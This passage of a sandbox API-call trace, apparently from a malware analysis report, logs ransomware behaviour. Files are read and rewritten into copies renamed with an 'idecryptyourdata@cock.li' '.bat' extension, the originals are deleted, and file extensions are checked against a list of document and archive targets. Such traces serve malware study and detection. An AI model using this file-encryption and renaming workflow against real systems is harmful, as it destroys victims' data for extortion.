"c:\\588bce7c90097ed212\\1055\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0047.646] GetLastError () returned 0x0 [0047.646] ReadFile (in: hFile=0x2d0, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x12c12, lpOverlapped=0x0) returned 1 [0047.690] WriteFile (in: hFile=0x2d8, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x12c20, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x12c20, lpOverlapped=0x0) returned 1 [0047.692] ReadFile (in: hFile=0x2d0, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0047.692] WriteFile (in: hFile=0x2d8, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xf6, lpOverlapped=0x0) returned 1 [0047.693] SetEndOfFile (hFile=0x2d8) returned 1 [0047.693] CloseHandle (hObject=0x2d8) returned 1 [0047.695] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.695] SetEndOfFile (hFile=0x2d0) returned 1 [0047.696] CloseHandle (hObject=0x2d0) returned 1 [0047.696] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.697] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml")) returned 1 [0047.697] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 44 [0047.697] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 44 [0047.697] lstrlenW (lpString=".doc") returned 4 [0047.697] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0047.697] lstrlenW (lpString=".docx") returned 5 [0047.697] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0047.697] lstrlenW (lpString=".pdf") returned 4 [0047.697] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0047.697] lstrlenW (lpString=".xls") returned 4 [0047.697] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0047.697] lstrlenW (lpString=".xlsx") returned 5 [0047.697] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0047.697] lstrlenW (lpString=".ppt") returned 4 [0047.698] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0047.698] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 44 [0047.698] lstrlenW (lpString=".zip") returned 4 [0047.698] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0047.698] lstrlenW (lpString=".rar") returned 4 [0047.698] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0047.698] lstrlenW (lpString=".bz2") returned 4 [0047.698] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0047.698] lstrlenW (lpString=".7z") returned 3 [0047.698] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0047.698] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 44 [0047.698] lstrlenW (lpString=".dbf") returned 4 [0047.698] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0047.698] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 44 [0047.698] lstrlenW (lpString=".1cd") returned 4 [0047.698] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0047.698] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 44 [0047.698] lstrlenW (lpString=".jpg") returned 4 [0047.698] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0047.698] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 44 [0047.699] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 44 [0047.699] lstrlenW (lpString=".doc") returned 4 [0047.699] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0047.699] lstrlenW (lpString=".docx") returned 5 [0047.699] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0047.699] lstrlenW (lpString=".pdf") returned 4 [0047.699] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0047.699] lstrlenW (lpString=".xls") returned 4 [0047.699] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0047.699] lstrlenW (lpString=".xlsx") returned 5 [0047.699] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0047.699] lstrlenW (lpString=".ppt") returned 4 [0047.699] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0047.699] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 44 [0047.699] lstrlenW (lpString=".zip") returned 4 [0047.699] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0047.699] lstrlenW (lpString=".rar") returned 4 [0047.699] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0047.699] lstrlenW (lpString=".bz2") returned 4 [0047.699] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0047.699] lstrlenW (lpString=".7z") returned 3 [0047.699] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0047.699] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 44 [0047.699] lstrlenW (lpString=".dbf") returned 4 [0047.699] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0047.699] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 44 [0047.699] lstrlenW (lpString=".1cd") returned 4 [0047.699] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0047.699] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 44 [0047.700] lstrlenW (lpString=".jpg") returned 4 [0047.700] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0047.700] lstrcmpiW (lpString1=".rtf", lpString2=".bat") returned 1 [0047.700] lstrlenW (lpString="eula.rtf") returned 8 [0047.700] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0047.722] GetFileSizeEx (in: hFile=0x2dc, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=4015) returned 1 [0047.722] CloseHandle (hObject=0x2dc) returned 1 [0047.722] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2070\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf")) returned 0x80 [0047.722] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2070\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.722] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0047.722] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.722] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.722] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0047.723] GetLastError () returned 0x0 [0047.723] ReadFile (in: hFile=0x2dc, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0xfaf, lpOverlapped=0x0) returned 1 [0047.817] WriteFile (in: hFile=0x2c0, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xfb0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xfb0, lpOverlapped=0x0) returned 1 [0047.818] ReadFile (in: hFile=0x2dc, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0047.818] WriteFile (in: hFile=0x2c0, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xe4, lpOverlapped=0x0) returned 1 [0047.818] SetEndOfFile (hFile=0x2c0) returned 1 [0047.818] CloseHandle (hObject=0x2c0) returned 1 [0047.819] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.819] SetEndOfFile (hFile=0x2dc) returned 1 [0047.820] CloseHandle (hObject=0x2dc) returned 1 [0047.820] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2070\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.820] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf")) returned 1 [0047.820] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 35 [0047.820] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 35 [0047.820] lstrlenW (lpString=".doc") returned 4 [0047.820] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0047.820] lstrlenW (lpString=".docx") returned 5 [0047.820] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0047.820] lstrlenW (lpString=".pdf") returned 4 [0047.820] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0047.821] lstrlenW (lpString=".xls") returned 4 [0047.821] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0047.821] lstrlenW (lpString=".xlsx") returned 5 [0047.821] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0047.821] lstrlenW (lpString=".ppt") returned 4 [0047.821] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0047.821] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 35 [0047.821] lstrlenW (lpString=".zip") returned 4 [0047.821] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0047.821] lstrlenW (lpString=".rar") returned 4 [0047.821] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0047.821] lstrlenW (lpString=".bz2") returned 4 [0047.821] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0047.821] lstrlenW (lpString=".7z") returned 3 [0047.821] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0047.821] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 35 [0047.821] lstrlenW (lpString=".dbf") returned 4 [0047.821] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0047.821] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 35 [0047.821] lstrlenW (lpString=".1cd") returned 4 [0047.821] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0047.821] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 35 [0047.821] lstrlenW (lpString=".jpg") returned 4 [0047.821] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0047.821] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 35 [0047.821] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 35 [0047.821] lstrlenW (lpString=".doc") returned 4 [0047.821] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0047.821] lstrlenW (lpString=".docx") returned 5 [0047.821] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0047.821] lstrlenW (lpString=".pdf") returned 4 [0047.821] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0047.821] lstrlenW (lpString=".xls") returned 4 [0047.822] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0047.822] lstrlenW (lpString=".xlsx") returned 5 [0047.822] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0047.822] lstrlenW (lpString=".ppt") returned 4 [0047.822] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0047.822] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 35 [0047.822] lstrlenW (lpString=".zip") returned 4 [0047.822] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0047.822] lstrlenW (lpString=".rar") returned 4 [0047.822] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0047.822] lstrlenW (lpString=".bz2") returned 4 [0047.822] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0047.822] lstrlenW (lpString=".7z") returned 3 [0047.822] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0047.822] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 35 [0047.822] lstrlenW (lpString=".dbf") returned 4 [0047.822] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0047.822] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 35 [0047.822] lstrlenW (lpString=".1cd") returned 4 [0047.822] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0047.822] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 35 [0047.822] lstrlenW (lpString=".jpg") returned 4 [0047.822] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0047.822] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0047.822] lstrlenW (lpString="LocalizedData.xml") returned 17 [0047.822] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0047.823] GetFileSizeEx (in: hFile=0x2dc, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=79996) returned 1 [0047.823] CloseHandle (hObject=0x2dc) returned 1 [0047.823] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml")) returned 0x80 [0047.823] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.823] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0047.823] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.823] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.823] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0047.823] GetLastError () returned 0x0 [0047.824] ReadFile (in: hFile=0x2dc, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x1387c, lpOverlapped=0x0) returned 1 [0047.994] WriteFile (in: hFile=0x2c0, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x13880, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x13880, lpOverlapped=0x0) returned 1 [0047.996] ReadFile (in: hFile=0x2dc, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0047.996] WriteFile (in: hFile=0x2c0, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xf6, lpOverlapped=0x0) returned 1 [0047.996] SetEndOfFile (hFile=0x2c0) returned 1 [0047.996] CloseHandle (hObject=0x2c0) returned 1 [0047.998] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.998] SetEndOfFile (hFile=0x2dc) returned 1 [0047.999] CloseHandle (hObject=0x2dc) returned 1 [0047.999] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.999] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml")) returned 1 [0048.000] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 44 [0048.000] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 44 [0048.000] lstrlenW (lpString=".doc") returned 4 [0048.000] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0048.000] lstrlenW (lpString=".docx") returned 5 [0048.000] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0048.000] lstrlenW (lpString=".pdf") returned 4 [0048.000] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0048.000] lstrlenW (lpString=".xls") returned 4 [0048.000] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0048.000] lstrlenW (lpString=".xlsx") returned 5 [0048.000] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0048.000] lstrlenW (lpString=".ppt") returned 4 [0048.000] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0048.000] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 44 [0048.000] lstrlenW (lpString=".zip") returned 4 [0048.000] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0048.000] lstrlenW (lpString=".rar") returned 4 [0048.000] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0048.000] lstrlenW (lpString=".bz2") returned 4 [0048.000] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0048.000] lstrlenW (lpString=".7z") returned 3 [0048.000] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0048.001] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 44 [0048.001] lstrlenW (lpString=".dbf") returned 4 [0048.001] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0048.001] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 44 [0048.001] lstrlenW (lpString=".1cd") returned 4 [0048.001] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0048.001] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 44 [0048.001] lstrlenW (lpString=".jpg") returned 4 [0048.001] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0048.001] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 44 [0048.001] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 44 [0048.001] lstrlenW (lpString=".doc") returned 4 [0048.001] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0048.001] lstrlenW (lpString=".docx") returned 5 [0048.001] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0048.001] lstrlenW (lpString=".pdf") returned 4 [0048.001] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0048.001] lstrlenW (lpString=".xls") returned 4 [0048.001] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0048.001] lstrlenW (lpString=".xlsx") returned 5 [0048.001] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0048.001] lstrlenW (lpString=".ppt") returned 4 [0048.001] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0048.001] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 44 [0048.001] lstrlenW (lpString=".zip") returned 4 [0048.001] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0048.001] lstrlenW (lpString=".rar") returned 4 [0048.001] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0048.001] lstrlenW (lpString=".bz2") returned 4 [0048.001] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0048.001] lstrlenW (lpString=".7z") returned 3 [0048.001] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0048.001] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 44 [0048.001] lstrlenW (lpString=".dbf") returned 4 [0048.001] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0048.001] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 44 [0048.001] lstrlenW (lpString=".1cd") returned 4 [0048.002] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0048.002] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 44 [0048.002] lstrlenW (lpString=".jpg") returned 4 [0048.002] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0048.002] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0048.002] lstrlenW (lpString="Parameterinfo.xml") returned 17 [0048.002] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0048.003] GetFileSizeEx (in: hFile=0x2dc, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=93314) returned 1 [0048.003] CloseHandle (hObject=0x2dc) returned 1 [0048.003] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml")) returned 0x80 [0048.003] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0048.003] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0048.003] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0048.003] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0048.003] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0048.003] GetLastError () returned 0x0 [0048.003] ReadFile (in: hFile=0x2dc, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x16c82, lpOverlapped=0x0) returned 1 [0048.096] WriteFile (in: hFile=0x2c0, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x16c90, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x16c90, lpOverlapped=0x0) returned 1 [0048.097] ReadFile (in: hFile=0x2dc, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0048.097] WriteFile (in: hFile=0x2c0, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xf6, lpOverlapped=0x0) returned 1 [0048.098] SetEndOfFile (hFile=0x2c0) returned 1 [0048.098] CloseHandle (hObject=0x2c0) returned 1 [0048.100] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0048.100] SetEndOfFile (hFile=0x2dc) returned 1 [0048.101] CloseHandle (hObject=0x2dc) returned 1 [0048.101] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0048.101] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml")) returned 1 [0048.102] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 48 [0048.102] lstrlenW (lpString="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 48 [0048.102] lstrlenW (lpString=".doc") returned 4 [0048.102] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0048.102] lstrlenW 